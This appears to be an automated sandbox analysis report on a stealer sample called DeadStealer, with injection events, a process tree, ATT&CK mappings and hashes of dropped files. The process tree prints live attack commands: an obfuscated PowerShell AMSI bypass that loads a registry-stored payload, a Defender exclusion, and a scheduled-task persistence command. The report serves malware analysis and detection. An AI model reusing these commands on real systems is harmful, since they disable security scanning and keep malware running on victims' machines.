Token: SeDebugPrivilege	4476	DeadStealer.exe
Token: SeDebugPrivilege	2188	powershell.exe
Token: SeIncreaseQuotaPrivilege	2188	powershell.exe
Token: SeSecurityPrivilege	2188	powershell.exe
Token: SeTakeOwnershipPrivilege	2188	powershell.exe
Token: SeLoadDriverPrivilege	2188	powershell.exe
Token: SeSystemProfilePrivilege	2188	powershell.exe
Token: SeSystemtimePrivilege	2188	powershell.exe
Token: SeProfSingleProcessPrivilege	2188	powershell.exe
Token: SeIncBasePriorityPrivilege	2188	powershell.exe
Token: SeCreatePagefilePrivilege	2188	powershell.exe
Token: SeBackupPrivilege	2188	powershell.exe
Token: SeRestorePrivilege	2188	powershell.exe
Token: SeShutdownPrivilege	2188	powershell.exe
Token: SeDebugPrivilege	2188	powershell.exe
Token: SeSystemEnvironmentPrivilege	2188	powershell.exe
Token: SeRemoteShutdownPrivilege	2188	powershell.exe
Token: SeUndockPrivilege	2188	powershell.exe
Token: SeManageVolumePrivilege	2188	powershell.exe
Token: 33	2188	powershell.exe
Token: 34	2188	powershell.exe
Token: 35	2188	powershell.exe
Token: 36	2188	powershell.exe
Token: SeDebugPrivilege	2988	DeadXClient.exe
Token: SeDebugPrivilege	812	powershell.EXE
Token: SeDebugPrivilege	812	powershell.EXE
Token: SeDebugPrivilege	3772	dllhost.exe
Token: SeShutdownPrivilege	3340	Explorer.EXE
Token: SeCreatePagefilePrivilege	3340	Explorer.EXE
Token: SeAssignPrimaryTokenPrivilege	2416	svchost.exe
Token: SeIncreaseQuotaPrivilege	2416	svchost.exe
Token: SeSecurityPrivilege	2416	svchost.exe
Token: SeTakeOwnershipPrivilege	2416	svchost.exe
Token: SeLoadDriverPrivilege	2416	svchost.exe
Token: SeSystemtimePrivilege	2416	svchost.exe
Token: SeBackupPrivilege	2416	svchost.exe
Token: SeRestorePrivilege	2416	svchost.exe
Token: SeShutdownPrivilege	2416	svchost.exe
Token: SeSystemEnvironmentPrivilege	2416	svchost.exe
Token: SeUndockPrivilege	2416	svchost.exe
Token: SeManageVolumePrivilege	2416	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2416	svchost.exe
Token: SeIncreaseQuotaPrivilege	2416	svchost.exe
Token: SeSecurityPrivilege	2416	svchost.exe
Token: SeTakeOwnershipPrivilege	2416	svchost.exe
Token: SeLoadDriverPrivilege	2416	svchost.exe
Token: SeSystemtimePrivilege	2416	svchost.exe
Token: SeBackupPrivilege	2416	svchost.exe
Token: SeRestorePrivilege	2416	svchost.exe
Token: SeShutdownPrivilege	2416	svchost.exe
Token: SeSystemEnvironmentPrivilege	2416	svchost.exe
Token: SeUndockPrivilege	2416	svchost.exe
Token: SeManageVolumePrivilege	2416	svchost.exe
Token: SeDebugPrivilege	1708	wmiprvse.exe
Token: SeAuditPrivilege	2020	svchost.exe
Token: SeAuditPrivilege	2376	svchost.exe
Token: SeAuditPrivilege	2376	svchost.exe
Token: SeShutdownPrivilege	3340	Explorer.EXE
Token: SeCreatePagefilePrivilege	3340	Explorer.EXE
Token: SeShutdownPrivilege	3340	Explorer.EXE
Token: SeCreatePagefilePrivilege	3340	Explorer.EXE
Token: SeAssignPrimaryTokenPrivilege	2416	svchost.exe
Token: SeIncreaseQuotaPrivilege	2416	svchost.exe
Token: SeSecurityPrivilege	2416	svchost.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1012	dwm.exe
1012	dwm.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
3340	Explorer.EXE
3340	Explorer.EXE
3340	Explorer.EXE
3340	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4476 wrote to memory of 2188	4476	DeadStealer.exe	71
PID 4476 wrote to memory of 2188	4476	DeadStealer.exe	71
PID 4476 wrote to memory of 2028	4476	DeadStealer.exe	74
PID 4476 wrote to memory of 2028	4476	DeadStealer.exe	74
PID 2028 wrote to memory of 3192	2028	svchost.exe	75
PID 2028 wrote to memory of 3192	2028	svchost.exe	75
PID 2028 wrote to memory of 3192	2028	svchost.exe	75
PID 2028 wrote to memory of 2988	2028	svchost.exe	76
PID 2028 wrote to memory of 2988	2028	svchost.exe	76
PID 2988 wrote to memory of 2220	2988	DeadXClient.exe	80
PID 2988 wrote to memory of 2220	2988	DeadXClient.exe	80
PID 812 wrote to memory of 3772	812	powershell.EXE	82
PID 812 wrote to memory of 3772	812	powershell.EXE	82
PID 812 wrote to memory of 3772	812	powershell.EXE	82
PID 812 wrote to memory of 3772	812	powershell.EXE	82
PID 812 wrote to memory of 3772	812	powershell.EXE	82
PID 812 wrote to memory of 3772	812	powershell.EXE	82
PID 812 wrote to memory of 3772	812	powershell.EXE	82
PID 812 wrote to memory of 3772	812	powershell.EXE	82
PID 3772 wrote to memory of 600	3772	dllhost.exe	5
PID 3772 wrote to memory of 652	3772	dllhost.exe	7
PID 3772 wrote to memory of 748	3772	dllhost.exe	10
PID 3772 wrote to memory of 916	3772	dllhost.exe	13
PID 3772 wrote to memory of 1012	3772	dllhost.exe	14
PID 3772 wrote to memory of 328	3772	dllhost.exe	15
PID 3772 wrote to memory of 408	3772	dllhost.exe	16
PID 3772 wrote to memory of 596	3772	dllhost.exe	17
PID 3772 wrote to memory of 1096	3772	dllhost.exe	19
PID 3772 wrote to memory of 1104	3772	dllhost.exe	20
PID 3772 wrote to memory of 1204	3772	dllhost.exe	21
PID 3772 wrote to memory of 1216	3772	dllhost.exe	22
PID 3772 wrote to memory of 1224	3772	dllhost.exe	23
PID 3772 wrote to memory of 1232	3772	dllhost.exe	24
PID 3772 wrote to memory of 1400	3772	dllhost.exe	25
PID 3772 wrote to memory of 1468	3772	dllhost.exe	26
PID 3772 wrote to memory of 1480	3772	dllhost.exe	27
PID 3772 wrote to memory of 1532	3772	dllhost.exe	28
PID 3772 wrote to memory of 1588	3772	dllhost.exe	29
PID 3772 wrote to memory of 1664	3772	dllhost.exe	30
PID 3772 wrote to memory of 1680	3772	dllhost.exe	31
PID 3772 wrote to memory of 1736	3772	dllhost.exe	32
PID 3772 wrote to memory of 1772	3772	dllhost.exe	33
PID 3772 wrote to memory of 1784	3772	dllhost.exe	34
PID 3772 wrote to memory of 1864	3772	dllhost.exe	35
PID 3772 wrote to memory of 1872	3772	dllhost.exe	36
PID 3772 wrote to memory of 1984	3772	dllhost.exe	37
PID 3772 wrote to memory of 2020	3772	dllhost.exe	38
PID 3772 wrote to memory of 2284	3772	dllhost.exe	39
PID 3772 wrote to memory of 2340	3772	dllhost.exe	40
PID 3772 wrote to memory of 2348	3772	dllhost.exe	41
PID 3772 wrote to memory of 2376	3772	dllhost.exe	42
PID 3772 wrote to memory of 2396	3772	dllhost.exe	43
PID 3772 wrote to memory of 2408	3772	dllhost.exe	44
PID 3772 wrote to memory of 2416	3772	dllhost.exe	45
PID 3772 wrote to memory of 2432	3772	dllhost.exe	46
PID 3772 wrote to memory of 2576	3772	dllhost.exe	47
PID 3772 wrote to memory of 2880	3772	dllhost.exe	48
PID 3772 wrote to memory of 2920	3772	dllhost.exe	49
PID 3772 wrote to memory of 2940	3772	dllhost.exe	50
PID 3772 wrote to memory of 3056	3772	dllhost.exe	51
PID 3772 wrote to memory of 3008	3772	dllhost.exe	52
PID 3772 wrote to memory of 3108	3772	dllhost.exe	53
PID 3772 wrote to memory of 3340	3772	dllhost.exe	54
PID 3772 wrote to memory of 3864	3772	dllhost.exe	57

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:600
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Suspicious use of FindShellTrayWindow
  PID:1012
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{a2afc2a8-fd07-491d-b7a2-b551f34aee5f}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3772

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:652

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:748

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:916

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:328

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:408

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:596

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
PID:1096

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
PID:1104
- c:\windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:3056
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:mJxZtCVPQAPK{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$HucXNVWNvAYKBw,[Parameter(Position=1)][Type]$vpniheRIvP)$wRzLwZowNGb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+'l'+''+[Char](101)+''+[Char](99)+''+'t'+'e'+[Char](100)+''+'D'+'e'+[Char](108)+''+[Char](101)+''+'g'+'ate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+'e'+'m'+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType('M'+'y'+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e'+[Char](84)+''+[Char](121)+''+'p'+'e',''+'C'+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+'n'+''+'s'+''+[Char](105)+'Cl'+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+'t'+''+[Char](111)+'C'+[Char](108)+'a'+[Char](115)+''+'s'+'',[MulticastDelegate]);$wRzLwZowNGb.DefineConstructor(''+'R'+''+'T'+'S'+'p'+'e'+'c'+''+'i'+''+[Char](97)+'l'+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+''+'i'+''+'d'+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+'g,'+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$HucXNVWNvAYKBw).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+'i'+'m'+''+[Char](101)+''+[Char](44)+''+'M'+'a'+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$wRzLwZowNGb.DefineMethod(''+'I'+''+'n'+'v'+'o'+''+[Char](107)+''+[Char](101)+'','P'+'u'+''+[Char](98)+''+[Char](108)+'ic'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+'S'+''+[Char](105)+''+'g'+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+'l'+[Char](111)+''+'t'+''+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+'a'+[Char](108)+'',$vpniheRIvP,$HucXNVWNvAYKBw).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+'g'+[Char](101)+''+[Char](100)+'');Write-Output $wRzLwZowNGb.CreateType();}$cjaMnwRjKvAjS=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+''+'t'+'e'+[Char](109)+''+[Char](46)+'d'+[Char](108)+'l')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+'ro'+'s'+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+'Wi'+[Char](110)+''+[Char](51)+'2'+[Char](46)+''+'U'+''+'n'+''+[Char](115)+''+[Char](97)+'f'+'e'+'N'+[Char](97)+''+'t'+''+[Char](105)+'v'+'e'+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+'ds');$sPtLxLYwZTVdRC=$cjaMnwRjKvAjS.GetMethod('G'+[Char](101)+''+[Char](116)+'P'+[Char](114)+'oc'+[Char](65)+''+[Char](100)+''+'d'+''+'r'+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+'S'+''+[Char](116)+''+[Char](97)+'tic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$NBVkCzpNYvRzedSnpMu=mJxZtCVPQAPK @([String])([IntPtr]);$EruqGDZwUvBgBTOcXWxJFE=mJxZtCVPQAPK @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$iWjFoGtbeor=$cjaMnwRjKvAjS.GetMethod(''+'G'+''+'e'+''+[Char](116)+'M'+'o'+''+'d'+''+[Char](117)+''+[Char](108)+'e'+[Char](72)+'a'+'n'+'d'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('ke'+'r'+'ne'+[Char](108)+''+'3'+''+[Char](50)+''+[Char](46)+''+[Char](100)+'ll')));$TWGNueyubeTZBH=$sPtLxLYwZTVdRC.Invoke($Null,@([Object]$iWjFoGtbeor,[Object]('Lo'+[Char](97)+'d'+[Char](76)+'ib'+'r'+''+[Char](97)+''+'r'+''+'y'+''+[Char](65)+'')));$witYAKNjbnwSjZclk=$sPtLxLYwZTVdRC.Invoke($Null,@([Object]$iWjFoGtbeor,[Object](''+[Char](86)+''+[Char](105)+''+'r'+'t'+'u'+''+[Char](97)+''+[Char](108)+'P'+[Char](114)+'o'+'t'+''+[Char](101)+''+'c'+''+[Char](116)+'')));$uzXmpUc=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TWGNueyubeTZBH,$NBVkCzpNYvRzedSnpMu).Invoke('am'+'s'+'i'+[Char](46)+'d'+[Char](108)+''+'l'+'');$AVjEQPeOUrcvYCnyG=$sPtLxLYwZTVdRC.Invoke($Null,@([Object]$uzXmpUc,[Object]('A'+'m'+''+[Char](115)+''+'i'+''+'S'+''+[Char](99)+''+[Char](97)+'nB'+'u'+''+[Char](102)+''+'f'+'e'+[Char](114)+'')));$aIyXbGPOUF=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($witYAKNjbnwSjZclk,$EruqGDZwUvBgBTOcXWxJFE).Invoke($AVjEQPeOUrcvYCnyG,[uint32]8,4,[ref]$aIyXbGPOUF);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AVjEQPeOUrcvYCnyG,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($witYAKNjbnwSjZclk,$EruqGDZwUvBgBTOcXWxJFE).Invoke($AVjEQPeOUrcvYCnyG,[uint32]8,0x20,[ref]$aIyXbGPOUF);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'FT'+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](68)+''+'e'+''+[Char](97)+''+[Char](100)+''+[Char](115)+''+[Char](116)+'a'+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:812
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4844
- C:\Users\Public\DeadXClient.exe
  C:\Users\Public\DeadXClient.exe
  2⤵
  - Executes dropped EXE
  PID:3364

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1204

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1216

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1224

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1232

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1400

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1468

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1480
- c:\windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2920

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1532

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1588

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1664

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1680

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1736

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1772

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1784

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1864

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1872

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1984

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2020

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2284

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
PID:2340

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2348

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2376

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2396

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2408

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2416

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2432

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2576

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2880

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:2940

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
1⤵
PID:3008

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3108

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3340
- C:\Users\Admin\AppData\Local\Temp\DeadStealer.exe
  "C:\Users\Admin\AppData\Local\Temp\DeadStealer.exe"
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4476
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:2188
- - C:\Users\Public\Documents\svchost.exe
    "C:\Users\Public\Documents\svchost.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2028
  - - C:\Users\Public\DeadCodeRootKit.exe
      "C:\Users\Public\DeadCodeRootKit.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3192
  - - C:\Users\Public\DeadXClient.exe
      "C:\Users\Public\DeadXClient.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2988
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "DeadXClient" /tr "C:\Users\Public\DeadXClient.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2220

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3864

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2096

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:4876

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
PID:3580

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:1608

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
1⤵
PID:3244

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4512

C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
1⤵
PID:1176

C:\Windows\System32\InstallAgent.exe
C:\Windows\System32\InstallAgent.exe -Embedding
1⤵
PID:4412

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:5088

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:4128

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1708

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:4376

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1516

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db

Filesize
14KB

MD5
97cea2ecb607d9b8cf79b35ac418cf7f

SHA1
54caed4a6fdff3b8fa69b186e5a64eb6be5496b5

SHA256
200608d00e3b5083c39c6dd583fc5261f138a9e2711b24c3a72d123002da5266

SHA512
a2f688f76bd1d3a2c5c1321c258edd3360ab28af0ea159dff76926ff3733efbf0710a582e7a38e8d3278ead81f80ca4fa913d8af165bca0dff8106b0e93deb4c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_llterzxl.ix4.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Public\DeadCodeRootKit.exe

Filesize
151KB

MD5
b8479a23c22cf6fc456e197939284069

SHA1
b2d98cc291f16192a46f363d007e012d45c63300

SHA256
18294ee5a6383a48d1bcf2703f17d815529df3a17580e027c3efea1800900e8f

SHA512
786cd468ce3723516dc869b09e008ec5d35d1f0c1a61e70083a3be15180866be637bd7d8665c2f0218c56875a0ee597c277e088f77dd403bdd2182d06bad3bd4

Download Submit
C:\Users\Public\DeadXClient.exe

Filesize
34KB

MD5
0dec47218426dfc9cf63a4074964ac9d

SHA1
579d7c8a7156b306b3661cfd156f91ec6bd1ed4d

SHA256
d7095de943a18d68425fc62cdcb39add9819fab6089382171138585d98174415

SHA512
9bb7da6b0170bcde815a77033e581c1b2a34db2b89205a59a0cd5058f76edda414100bd0ad95f306261f38f894b1b61a26e9a22be383965aeaeaa254fe3e0c09

Download Submit
C:\Users\Public\Documents\svchost.exe

Filesize
281KB

MD5
8960120f7a4b458783331d2fbd75006d

SHA1
08582ccda4853bed8e2acb78cc78a1e3ab53000c

SHA256
510990b40e42200f2daacf1f1ee3e4a7b14ac10b24cfecd7d35820d99230dc8b

SHA512
32bec63ed93e4651d954198e7391a8c48146f44400ec21ccb66959bc30042bca7c33445f80148ecf5472ac6eb06a1cf4880ddf12cba6ca93142795dff9ee3ccd

Download Submit
memory/600-133-0x000001C56CAF0000-0x000001C56CB12000-memory.dmp

Filesize
136KB

Download
memory/600-134-0x000001C56CB20000-0x000001C56CB47000-memory.dmp

Filesize
156KB

Download
memory/600-135-0x000001C56CB20000-0x000001C56CB47000-memory.dmp

Filesize
156KB

Download
memory/600-141-0x000001C56CB20000-0x000001C56CB47000-memory.dmp

Filesize
156KB

Download
memory/600-142-0x00007FFA50340000-0x00007FFA50350000-memory.dmp

Filesize
64KB

Download
memory/652-153-0x00007FFA50340000-0x00007FFA50350000-memory.dmp

Filesize
64KB

Download
memory/652-152-0x0000026F771B0000-0x0000026F771D7000-memory.dmp

Filesize
156KB

Download
memory/652-146-0x0000026F771B0000-0x0000026F771D7000-memory.dmp

Filesize
156KB

Download
memory/748-164-0x00007FFA50340000-0x00007FFA50350000-memory.dmp

Filesize
64KB

Download
memory/748-163-0x00000178FE290000-0x00000178FE2B7000-memory.dmp

Filesize
156KB

Download
memory/748-157-0x00000178FE290000-0x00000178FE2B7000-memory.dmp

Filesize
156KB

Download
memory/812-121-0x00007FFA8EEF0000-0x00007FFA8EF9E000-memory.dmp

Filesize
696KB

Download
memory/812-120-0x00007FFA902B0000-0x00007FFA9048B000-memory.dmp

Filesize
1.9MB

Download
memory/812-119-0x000002D375850000-0x000002D375878000-memory.dmp

Filesize
160KB

Download
memory/916-174-0x00000269476D0000-0x00000269476F7000-memory.dmp

Filesize
156KB

Download
memory/916-175-0x00007FFA50340000-0x00007FFA50350000-memory.dmp

Filesize
64KB

Download
memory/916-168-0x00000269476D0000-0x00000269476F7000-memory.dmp

Filesize
156KB

Download
memory/1012-179-0x00000223A43A0000-0x00000223A43C7000-memory.dmp

Filesize
156KB

Download
memory/2028-79-0x0000000000E90000-0x0000000000E96000-memory.dmp

Filesize
24KB

Download
memory/2028-76-0x0000000000A30000-0x0000000000A7E000-memory.dmp

Filesize
312KB

Download
memory/2028-77-0x0000000000E80000-0x0000000000E86000-memory.dmp

Filesize
24KB

Download
memory/2028-78-0x0000000001300000-0x0000000001342000-memory.dmp

Filesize
264KB

Download
